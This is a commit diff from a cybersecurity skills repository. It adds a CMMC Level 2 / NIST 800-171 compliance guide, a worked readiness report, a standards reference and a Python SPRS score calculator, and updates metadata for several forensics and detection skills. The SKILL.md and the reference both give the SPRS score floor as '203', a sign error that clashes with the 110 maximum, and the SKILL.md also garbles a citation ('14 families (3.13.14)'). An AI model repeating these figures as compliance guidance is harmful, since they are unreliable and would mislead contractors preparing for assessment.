control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to the Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by the Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding any notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. Please do not remove or change
the license header comment from a contributed file except when
necessary.
Copyright 2026 mukul975
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
skills/achieving-cmmc-level-2-compliance/SKILL.md
+142
View File
@@ -0,0 +1,142 @@
---
name: achieving-cmmc-level-2-compliance
description: >-
Prepare a defense-contractor environment for CMMC Level 2 certification: scope CUI
and FCI, implement the 110 NIST SP 800-171 Rev 2 security requirements across 14
families, compute the SPRS score with the DoD Assessment Methodology, manage a
compliant POA&M, and ready the organization for a C3PAO assessment. Use when an
organization handles Controlled Unclassified Information (CUI) under a DoD contract,
when a contract carries DFARS clause 252.204-7012/7019/7020/7021, when preparing for
or responding to a CMMC assessment, when computing or improving an SPRS score, when
building a System Security Plan or POA&M for 800-171, or when scoping which systems
are in the CUI boundary. Keywords: CMMC, CMMC Level 2, NIST 800-171, SP 800-171 Rev 2,
CUI, FCI, SPRS, DFARS 7012, C3PAO, POA&M, System Security Plan, DoD Assessment
Methodology, 110 controls, defense industrial base, DIB, FedRAMP equivalency.
domain: cybersecurity
subdomain: compliance-governance
tags:
- cmmc
- nist-800-171
- cui
- sprs
- dfars
- c3pao
- poam
- compliance
- governance
- defense-industrial-base
version: "1.0"
author: andrewibrah
license: Apache-2.0
nist_csf:
- GV.OC-03
- GV.SC-01
- ID.AM-08
- ID.RA-05
- PR.AA-01
- PR.DS-01
mitre_attack:
- T1078
- T1190
- T1041
- T1048
- T1567
---
# Achieving CMMC Level 2 Compliance
## When to Use
- When an organization in the **Defense Industrial Base (DIB)** stores, processes, or transmits **Controlled Unclassified Information (CUI)** under a DoD contract.
- When a contract includes **DFARS 252.204-7012** (safeguarding/incident reporting), **-7019/-7020** (NIST 800-171 self-assessment + SPRS), or the new **-7021** (CMMC requirement).
- When preparing for a **C3PAO** third-party assessment or a DoD-led assessment.
- When you must **compute, post, or improve an SPRS score** based on the NIST SP 800-171 DoD Assessment Methodology.
- When authoring or remediating a **System Security Plan (SSP)** and **POA&M** for the 110 requirements.
- When **scoping** which assets fall inside the CUI/FCI boundary (CUI assets, security-protection assets, contractor risk-managed assets, out-of-scope).
## Prerequisites
- Knowledge of **which contracts carry CUI** and the CUI categories involved (check the contract and the DoD CUI Registry).
- An asset inventory and network diagram so you can define the **CMMC assessment scope** before assessing controls.
- The **NIST SP 800-171 Rev 2** requirements and the **DoD Assessment Methodology** scoring weights.
- A documented **SSP** (its absence is itself a failed requirement — 3.12.4).
- Identification of any **External Service Providers (ESPs)** / cloud services touching CUI, and whether they meet **FedRAMP Moderate (or equivalency)**.
## Workflow
### 1. Determine applicability and CUI categories
Confirm the contract requires CMMC Level 2 (CUI present, not just FCI). FCI-only contracts are **Level 1** (the 15 FAR 52.204-21 requirements). Identify CUI categories from the contract and the DoD CUI Registry.
### 2. Scope the environment
Classify every asset into one of the CMMC scoping categories:
- **CUI Assets** — process/store/transmit CUI (in scope, assessed against all applicable controls).
- **Security Protection Assets** — provide security to the CUI environment (in scope).
- **Contractor Risk Managed Assets** — could but are not intended to handle CUI; managed by policy.
- **Specialized Assets** (IoT/OT, GFE, test equipment) — documented, limited assessment.
- **Out-of-Scope** — physically/logically isolated from CUI.
Minimize scope deliberately — a smaller, well-segmented CUI enclave is far cheaper to certify than a flat network.
### 3. Implement the 110 requirements (NIST SP 800-171 Rev 2)
Work the **14 families** (3.13.14). For each requirement, implement, then write the **how** in the SSP. High-leverage early wins: MFA (3.5.3), FIPS-validated cryptography (3.13.11), audit logging (3.3.x), access control + least privilege (3.1.x), and incident response (3.6.x).
### 4. Score with the DoD Assessment Methodology (SPRS)
Start at **110** and subtract the weighted value (**1, 3, or 5 points**) of each **unmet** requirement; partial credit applies to a small number of controls (e.g., MFA, FIPS crypto). The result is the **SPRS score** (maximum 110; the methodology floor is 203). Post the score, the SSP date, and the assessment scope to **SPRS** (or eMASS for higher assessments).
### 5. Build a compliant POA&M
Document every unmet requirement with owner, remediation, and milestone. **Constraints under the CMMC rule:** a **Conditional** status requires a score of at least **80%** (≥ 88 of 110), only **POA&M-eligible** requirements may be deferred (the highest-weighted security requirements must be fully met — verify eligibility against 32 CFR Part 170), and all POA&M items must be **closed within 180 days** to convert Conditional → **Final**.
### 6. Assess (self or C3PAO)
- **Level 1** and a subset of Level 2 = annual **self-assessment** with an affirmation in SPRS.
- **Level 2 (most CUI contracts)** = triennial **C3PAO** certification assessment.
- **Level 3** = DoD (DIBCAC) assessment on top of Level 2, adding SP 800-172 enhanced requirements.
Assessors evaluate each objective as **MET / NOT MET / N/A** with evidence (examine/interview/test). A senior official files the **annual affirmation** of continued compliance.
### 7. Maintain certification
Certification is valid **three years** with **annual affirmations**. Maintain the SSP, re-score on change, keep evidence current, and feed significant changes back into the assessment.
## Key Concepts
| Concept | Definition |
|---|---|
| FCI | Federal Contract Information — Level 1 protects it (FAR 52.204-21). |
| CUI | Controlled Unclassified Information — Level 2 protects it (NIST 800-171). |
| 110 requirements | The SP 800-171 Rev 2 security requirements across 14 families. |
| SPRS | Supplier Performance Risk System — where the 800-171 score is posted. |
| DoD Assessment Methodology | The 1/3/5-point weighting used to compute the score from 110. |
| C3PAO | CMMC Third-Party Assessment Organization — performs Level 2 certification. |
| POA&M | Plan of Action & Milestones — limited, must close in 180 days for Final status. |
| Conditional vs Final | Conditional = open POA&M (score ≥ 80%); Final = all controls met. |
| ESP | External Service Provider — must meet FedRAMP Moderate / equivalency for CUI. |
| Scoping categories | CUI / Security Protection / Contractor Risk Managed / Specialized / Out-of-Scope. |
## Tools & Systems
- **NIST SP 800-171 Rev 2** — the 110 requirements (and 800-171A for assessment objectives).
- **DoD NIST SP 800-171 Assessment Methodology** — the scoring weights.
- **32 CFR Part 170** (CMMC Program rule) and **48 CFR / DFARS 252.204-7021** (acquisition rule).
- **SPRS** — score posting; **SAM.gov** for registration.
- **SP 800-172 / 800-172A** — enhanced requirements for Level 3.
- **GRC / compliance tooling** — to manage the SSP, POA&M, and evidence (e.g., Xacta, RegScale, FutureFeed-style trackers).
## Common Scenarios
- **Prime flows CUI to a sub.** The sub needs its own Level 2 scope, SSP, SPRS score, and (most likely) C3PAO certification.
- **Score is below 88.** Prioritize the highest-weighted unmet requirements (5-point, then 3-point) to clear the conditional threshold and shrink the POA&M.
- **Cloud holds CUI.** Confirm the service is FedRAMP Moderate authorized or meets equivalency; document the responsibility split.
- **Flat network.** Re-scope into a segmented CUI enclave to cut the assessment surface before spending on controls.
- **Annual affirmation due.** A senior official affirms continued compliance in SPRS; let it lapse and you risk contract eligibility.
## Output Format
Produce a **CMMC Level 2 Readiness Report** using `assets/template.md`, containing:
1. **Applicability & CUI categories** — why Level 2 applies.
2. **Scope** — assets by scoping category and the CUI boundary diagram reference.
3. **Control status by family** — met / not met / N/A across the 14 families.
4. **SPRS score** — computed score, deductions, and the gap to 110 and to the 88 threshold.
5. **POA&M** — unmet requirements, eligibility check, owners, 180-day milestones.
6. **Assessment path** — self vs C3PAO, target date, affirmation owner.
7. **Remediation roadmap** — sequenced by point value and effort.
Use `scripts/process.py` to compute the SPRS score from a control-status JSON, flag POA&M-eligibility concerns, and report the gap to the conditional-certification threshold.
skills/achieving-cmmc-level-2-compliance/assets/template.md
+63
View File
@@ -0,0 +1,63 @@
# CMMC Level 2 Readiness Report — Worked Example
> Filled example for a small DIB manufacturer handling CUI on a segmented enclave.
> Replace bracketed content for your own organization.
## 1. Applicability & CUI Categories
- **Contract drivers:** Prime subcontract with DFARS **252.204-7012** and **-7021**; CUI present → **CMMC Level 2** required.
- **CUI categories (from contract + DoD CUI Registry):** Controlled Technical Information (CTI), Export Controlled (EAR).
- **Target assessment path:** Triennial **C3PAO** certification (Phase 2 applies from Nov 10, 2026).
## 2. Scope (CMMC Level 2 Scoping Guide)
| Category | Examples in this environment |
|---|---|
| CUI Assets | Engineering workstations, CUI file share, the segmented "Enclave-1" VLAN |
| Security Protection Assets | EDR console, SIEM, firewall, IdP/MFA, jump host |
| Contractor Risk Managed | General corporate laptops (policy-blocked from CUI) |
| Specialized Assets | CNC machine controllers (documented, isolated) |
| Out-of-Scope | Guest Wi-Fi, marketing SaaS |
**Boundary note:** CUI is confined to Enclave-1 behind segmentation and MFA. Deliberately minimized to shrink the assessment surface. See network diagram `CUI-boundary-v3`.
## 3. Control Status by Family (NIST SP 800-171 Rev 2)
*(summary; full per-requirement status lives in the SSP)*
| Family | Met | Partial | Not Met | N/A |
|---|---|---|---|---|
| 3.1 Access Control | 22 | 0 | 0 | 0 |
| 3.3 Audit & Accountability | 8 | 0 | 1 | 0 |
| 3.5 Identification & Auth | 10 | 1 | 0 | 0 |
| 3.8 Media Protection | 8 | 0 | 1 | 0 |
| 3.13 System & Comms Protection | 15 | 0 | 1 | 0 |
| 3.14 System & Info Integrity | 6 | 0 | 1 | 0 |
| *(others)* | all met | — | — | — |
## 4. SPRS Score
*(computed by `scripts/process.py` from the control-status JSON)*
- **Score: 97 / 110** (started at 110; deducted 13).
- **Gap to perfect:** 13 points across 4 not-met + 1 partial requirement.
- **Conditional threshold (≥ 88):** **MET** (margin 9) — eligible for Conditional status *if* the remaining items are POA&M-eligible.
- **Posted to SPRS:** score, SSP date, and assessment scope.
## 5. POA&M (eligibility-checked)
| ID | Requirement | Points | Eligibility | Remediation | Owner | Milestone (≤180d) |
|---|---|---|---|---|---|---|
| 3.3.1 | Audit log generation/coverage | 5 | **Verify** — high weight; confirm against 32 CFR 170 | Enable full audit policy + ship to SIEM | SecOps | 2026-07-30 |
| 3.13.11 | FIPS-validated cryptography | 3 | **Verify** eligibility | Replace non-validated module with FIPS 140-validated | Infra | 2026-08-15 |
| 3.5.3 | MFA (partial) | 3 | Partial-credit control | Extend MFA to remaining admin paths | IAM | 2026-07-20 |
| 3.8.9 | Backup CUI protection | 1 | Eligible | Encrypt + access-control backup store | Infra | 2026-08-31 |
| 3.14.1 | Flaw remediation | 1 | Eligible | Formalize patch SLA + tracking | IT | 2026-08-31 |
> The two 3-point and one 5-point items must clear eligibility review; the highest-weighted security requirements generally cannot remain on a POA&M. All items close within **180 days** to convert Conditional → **Final**.
## 6. Assessment Path
- **Type:** C3PAO certification assessment.
- **Target window:** Q4 2026, after POA&M closure of the high-weight items.
- **Affirmation owner:** [senior official] files the annual affirmation in SPRS.
## 7. Remediation Roadmap (sequenced by point value, then effort)
1. **3.3.1 audit logging (5 pts)** — biggest score lever and likely POA&M-ineligible → do first.
2. **3.13.11 FIPS crypto (3 pts)** and **3.5.3 MFA gap (3 pts)** — close to remove eligibility risk.
3. **3.8.9, 3.14.1 (1 pt each)** — low-effort cleanups before the C3PAO date.
4. Re-run the SPRS calculator after each closure; goal is **110** before assessment.
skills/achieving-cmmc-level-2-compliance/references/standards.md
+84
View File
@@ -0,0 +1,84 @@
# CMMC Level 2 — Standards & Reference
## Governing rules
| Rule | Citation | Status / effective date |
|---|---|---|
| CMMC Program rule | 32 CFR Part 170 | Effective **December 16, 2024** |
| CMMC acquisition rule (DFARS) | 48 CFR; DFARS clause **252.204-7021** (and 204.7503) | Published Sept 10, 2025; effective **November 10, 2025** |
| Safeguarding CUI / incident reporting | DFARS **252.204-7012** | In effect |
| NIST 800-171 self-assessment + SPRS posting | DFARS **252.204-7019 / -7020** | In effect |
> Always confirm current status at the source — acquisition rules and phase dates have moved before. Authoritative: https://dodcio.defense.gov/CMMC/ and the eCFR for 32 CFR Part 170.
## Phased rollout (per the acquisition rule)
| Phase | Begins | What applies |
|---|---|---|
| Phase 1 | **Nov 10, 2025** | Level 1 and some Level 2 **self-assessment** required in solicitations |
| Phase 2 | **Nov 10, 2026** | Level 2 **C3PAO certification** required for applicable contracts |
| Phase 3 | **Nov 10, 2027** | Level 2 C3PAO + Level 3 **DIBCAC** assessment phased in |
| Phase 4 | **Nov 10, 2028** | Full implementation across applicable DoD contracts |
## The three CMMC levels
| Level | Protects | Requirements | Assessment |
|---|---|---|---|
| Level 1 | FCI | 15 requirements (FAR 52.204-21) | Annual self-assessment + affirmation |
| Level 2 | CUI | **110 requirements (NIST SP 800-171 Rev 2)** | Self **or** triennial C3PAO certification |
| Level 3 | CUI (high priority) | 110 + selected **SP 800-172** enhanced | DoD (DIBCAC) assessment |
Certification validity: **3 years**, with **annual affirmation** by a senior official in SPRS.
## NIST SP 800-171 Rev 2 — the 14 families (110 requirements)
| § | Family | # reqs |
|---|---|---|
| 3.1 | Access Control | 22 |
| 3.2 | Awareness and Training | 3 |
| 3.3 | Audit and Accountability | 9 |
| 3.4 | Configuration Management | 9 |
| 3.5 | Identification and Authentication | 11 |
| 3.6 | Incident Response | 3 |
| 3.7 | Maintenance | 6 |
| 3.8 | Media Protection | 9 |
| 3.9 | Personnel Security | 2 |
| 3.10 | Physical Protection | 6 |
| 3.11 | Risk Assessment | 3 |
| 3.12 | Security Assessment | 4 |
| 3.13 | System and Communications Protection | 16 |
| 3.14 | System and Information Integrity | 7 |
| | **Total** | **110** |
(Assessment objectives for each requirement are in **NIST SP 800-171A**.)
## DoD Assessment Methodology — SPRS scoring
- Start at **110**. Subtract the weighted value of each **NOT MET** requirement.
- Weights: **1, 3, or 5 points**. The most security-significant requirements are weighted 3 or 5.
- **Partial credit** applies to a small number of requirements (notably MFA at 3.5.3 and FIPS-validated cryptography at 3.13.11) where partial implementation reduces the deduction.
- Maximum score **110**; the methodology floor is **203** (more is deducted than the 110 starting points because of the weighting).
- The complete per-requirement point assignment is published in the **DoD NIST SP 800-171 Assessment Methodology** — use that document for the authoritative weight of each control rather than estimating.
## POA&M rules under the CMMC rule (32 CFR Part 170)
- A **Conditional** Level 2 status is allowed only if the assessment score is **at least 80% (≥ 88 of 110)**.
- Only **POA&M-eligible** requirements may be deferred. The highest-weighted security requirements generally **must be fully met** and **cannot** sit on a POA&M — verify each item's eligibility against the rule.
- All POA&M items must be **closed within 180 days**; a closeout assessment then converts **Conditional → Final**.
## Scoping categories (CMMC Level 2 Scoping Guide)
| Category | Treatment |
|---|---|
| CUI Assets | Process/store/transmit CUI — assessed against applicable requirements. |
| Security Protection Assets | Provide security to the CUI environment — in scope. |
| Contractor Risk Managed Assets | Capable of handling CUI but not intended to — managed by policy/config. |
| Specialized Assets | IoT/OT, GFE, test equipment — documented, limited assessment. |
| Out-of-Scope Assets | Isolated from CUI — not assessed. |
## External Service Providers / cloud
- Cloud services that store/process/transmit CUI must be **FedRAMP Moderate authorized or meet FedRAMP Moderate equivalency**.
- Document the customer/provider responsibility split (CRM) and inherited controls in the SSP.
## NIST CSF 2.0 alignment
| CSF 2.0 ID | Relevance |
|---|---|
| GV.OC-03 | Legal/regulatory (DFARS/CMMC) requirements understood. |
| GV.SC-01 | Supply-chain risk management — flowdown to subs / ESPs. |
| ID.AM-08 | Assets managed across the lifecycle (scoping). |
| ID.RA-05 | Risk informs prioritization of unmet requirements. |
| PR.AA-01 | Identity and access (3.1 / 3.5 families). |
| PR.DS-01 | Data-at-rest protection (FIPS crypto, media protection). |
skills/achieving-cmmc-level-2-compliance/scripts/process.py
+198
View File
@@ -0,0 +1,198 @@
#!/usr/bin/env python3
"""
CMMC Level 2 / NIST SP 800-171 Rev 2 SPRS score calculator.
Implements the DoD Assessment Methodology arithmetic: start at 110 and subtract
the weighted value (1, 3, or 5) of each NOT MET requirement, with partial credit
for the small set of requirements that allow it. Reports the SPRS score, the gap
to a perfect 110 and to the 88-point (80%) conditional-certification threshold,
and flags higher-weighted unmet requirements whose POA&M eligibility must be
verified against 32 CFR Part 170.
NOTE: per-requirement point weights are defined by the DoD NIST SP 800-171
Assessment Methodology. Supply each requirement's official weight in the input
(this tool does not invent weights). Use status 'partial' with 'partial_deduction'
only for requirements the methodology allows partial credit on (e.g., 3.5.3 MFA,
3.13.11 FIPS crypto).
Input JSON shape:
{
"org": {"name": "Acme Defense LLC", "scope": "CUI enclave"},
"requirements": [
{"id": "3.1.1", "family": "3.1", "status": "met", "weight": 5},
{"id": "3.5.3", "family": "3.5", "status": "partial", "weight": 5, "partial_deduction": 3},
{"id": "3.3.1", "family": "3.3", "status": "not_met", "weight": 5},
{"id": "3.8.9", "family": "3.8", "status": "not_met", "weight": 1},
{"id": "3.2.1", "family": "3.2", "status": "na", "weight": 1}
]
}
status: met | not_met | partial | na
Usage:
python process.py --input controls.json [--output readiness.md]
python process.py --input controls.json --require-conditional # exit 1 if score < 88
"""
import argparse
import json
import sys
START_SCORE = 110
CONDITIONAL_THRESHOLD = 88 # 80% of 110
VALID_STATUS = {"met", "not_met", "partial", "na"}
VALID_WEIGHTS = {1, 3, 5}
def compute(data):
reqs = data.get("requirements", [])
if not reqs:
raise ValueError("requirements list is required")
deductions = 0
counts = {"met": 0, "not_met": 0, "partial": 0, "na": 0}
poam_flags = [] # higher-weight unmet -> verify POA&M eligibility
by_family = {} # family -> {met,not_met,partial,na}
detail = []
for r in reqs:
rid = r.get("id", "?")
status = r.get("status")
weight = r.get("weight")
if status not in VALID_STATUS:
raise ValueError(f"{rid}: status '{status}' invalid (met|not_met|partial|na)")
if status in ("not_met", "partial", "met") and weight not in VALID_WEIGHTS:
raise ValueError(f"{rid}: weight '{weight}' invalid (must be 1, 3, or 5)")
fam = r.get("family", rid.rsplit(".", 1)[0])
fam_rec = by_family.setdefault(fam, {"met": 0, "not_met": 0, "partial": 0, "na": 0})
fam_rec[status] += 1
counts[status] += 1
ded = 0
if status == "not_met":
ded = weight
if weight > 1:
poam_flags.append((rid, weight))
elif status == "partial":
ded = r.get("partial_deduction")
if ded is None:
raise ValueError(f"{rid}: status 'partial' requires 'partial_deduction'")
if ded < 0 or ded > weight:
raise ValueError(f"{rid}: partial_deduction {ded} out of range (0..{weight})")
if ded > 1:
poam_flags.append((rid, ded))
deductions += ded
detail.append((rid, fam, status, weight, ded))
score = START_SCORE - deductions
return {
"score": score,
"deductions": deductions,
"counts": counts,
"by_family": by_family,
"poam_flags": poam_flags,
"detail": detail,
}
def render(data, res):
org = data.get("org", {})
lines = []
lines.append(f"# CMMC Level 2 Readiness - {org.get('name','Organization')}")
lines.append("")
if org.get("scope"):
lines.append(f"- **Scope:** {org['scope']}")
lines.append("")
score = res["score"]
lines.append("## SPRS Score (DoD Assessment Methodology)")
lines.append("")
lines.append(f"- **Score:** **{score}** / 110 (started at 110, deducted {res['deductions']})")
lines.append(f"- **Gap to perfect (110):** {110 - score}")
if score >= CONDITIONAL_THRESHOLD:
lines.append(f"- **Conditional threshold (>= {CONDITIONAL_THRESHOLD}):** MET "
f"(margin {score - CONDITIONAL_THRESHOLD}) - eligible for Conditional status "
"if remaining items are POA&M-eligible.")
else:
lines.append(f"- **Conditional threshold (>= {CONDITIONAL_THRESHOLD}):** NOT MET "
f"(short by {CONDITIONAL_THRESHOLD - score}) - not eligible for Conditional "
"certification until the score reaches 88.")
c = res["counts"]
lines.append(f"- **Status tally:** met {c['met']}, partial {c['partial']}, "
f"not met {c['not_met']}, N/A {c['na']}")
lines.append("")
# by family
lines.append("## Status by family")
lines.append("")
lines.append("| Family | Met | Partial | Not Met | N/A |")
lines.append("|---|---|---|---|---|")
for fam in sorted(res["by_family"]):
f = res["by_family"][fam]
lines.append(f"| {fam} | {f['met']} | {f['partial']} | {f['not_met']} | {f['na']} |")
lines.append("")
# POA&M eligibility flags
lines.append("## POA&M eligibility check")
lines.append("")
if not res["poam_flags"]:
lines.append("No unmet requirement carries more than 1 point of deduction. "
"Remaining gaps are most likely POA&M-eligible (still verify against 32 CFR Part 170).")
else:
lines.append("The following unmet/partial requirements carry **> 1 point**. The highest-weighted "
"security requirements generally **cannot** sit on a POA&M - verify each against "
"32 CFR Part 170 before relying on Conditional status:")
lines.append("")
lines.append("| Requirement | Points lost |")
lines.append("|---|---|")
for rid, w in sorted(res["poam_flags"], key=lambda x: -x[1]):
lines.append(f"| {rid} | {w} |")
lines.append("")
lines.append("> All POA&M items must be closed within **180 days** to convert Conditional -> Final.")
return "\n".join(lines)
def main():
ap = argparse.ArgumentParser(description="CMMC L2 / NIST 800-171 SPRS score calculator")
ap.add_argument("--input", "-i", required=True, help="Path to control-status JSON")
ap.add_argument("--output", "-o", help="Write Markdown readiness report to this path")
ap.add_argument("--require-conditional", action="store_true",
help="Exit non-zero if SPRS score < 88 (conditional threshold)")
args = ap.parse_args()
try:
with open(args.input) as f:
data = json.load(f)
except (OSError, json.JSONDecodeError) as e:
print(f"ERROR: could not read input JSON: {e}", file=sys.stderr)
return 2
try:
res = compute(data)
md = render(data, res)
except ValueError as e:
print(f"ERROR: {e}", file=sys.stderr)
return 2
if args.output:
with open(args.output, "w") as f:
f.write(md + "\n")
print(f"Readiness report written to {args.output}", file=sys.stderr)
else:
print(md)
print(f"SPRS score {res['score']}/110 (deductions {res['deductions']}; "
f"not met {res['counts']['not_met']}, partial {res['counts']['partial']}).",
file=sys.stderr)
if args.require_conditional and res["score"] < CONDITIONAL_THRESHOLD:
print(f"FAIL: score {res['score']} < {CONDITIONAL_THRESHOLD} conditional threshold.",
file=sys.stderr)
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
skills/acquiring-disk-image-with-dd-and-dcfldd/SKILL.md
+7 -2
View File
@@ -1,7 +1,7 @@
---
name: acquiring-disk-image-with-dd-and-dcfldd
description: Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through
hash verification.
description: Create forensically sound bit-for-bit disk images using dd and dcfldd
while preserving evidence integrity through hash verification.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,11 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1006
- T1005
- T1025
- T1074.001
---
# Acquiring Disk Image with dd and dcfldd
skills/analyzing-active-directory-acl-abuse/SKILL.md
+8 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-active-directory-acl-abuse
description: Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and
WriteOwner abuse paths
description: Detect dangerous ACL misconfigurations in Active Directory using ldap3
to identify GenericAll, WriteDACL, and WriteOwner abuse paths
domain: cybersecurity
subdomain: identity-security
tags:
@@ -16,6 +16,12 @@ nist_csf:
- PR.AA-01
- PR.AA-05
- PR.AA-06
mitre_attack:
- T1098
- T1098.007
- T1484.001
- T1222.001
- T1078.002
---
skills/analyzing-android-malware-with-apktool/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-android-malware-with-apktool
description: Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source
recovery, and androguard for permission analysis, manifest inspection, and suspicious API call detection.
description: Perform static analysis of Android APK malware samples using apktool
for decompilation, jadx for Java source recovery, and androguard for permission
analysis, manifest inspection, and suspicious API call detection.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -21,6 +22,12 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1406
- T1407
- T1626.001
- T1655.001
- T1521.001
---
# Analyzing Android Malware with Apktool
skills/analyzing-api-gateway-access-logs/SKILL.md
+16 -6
View File
@@ -1,17 +1,22 @@
---
name: analyzing-api-gateway-access-logs
description: 'Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect BOLA/IDOR attacks, rate limit bypass,
credential scanning, and injection attempts. Uses pandas for statistical analysis of request patterns and anomaly detection.
description: 'Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect
BOLA/IDOR attacks, rate limit bypass, credential scanning, and injection attempts.
Uses pandas for statistical analysis of request patterns and anomaly detection.
Use when investigating API abuse or building API-specific threat detection rules.
'
domain: cybersecurity
subdomain: security-operations
tags:
- analyzing
- api
- gateway
- access
- api-security
- access-log-analysis
- aws-api-gateway
- kong
- nginx
- bola-detection
- rate-limit-bypass
- security-operations
version: '1.0'
author: mahipal
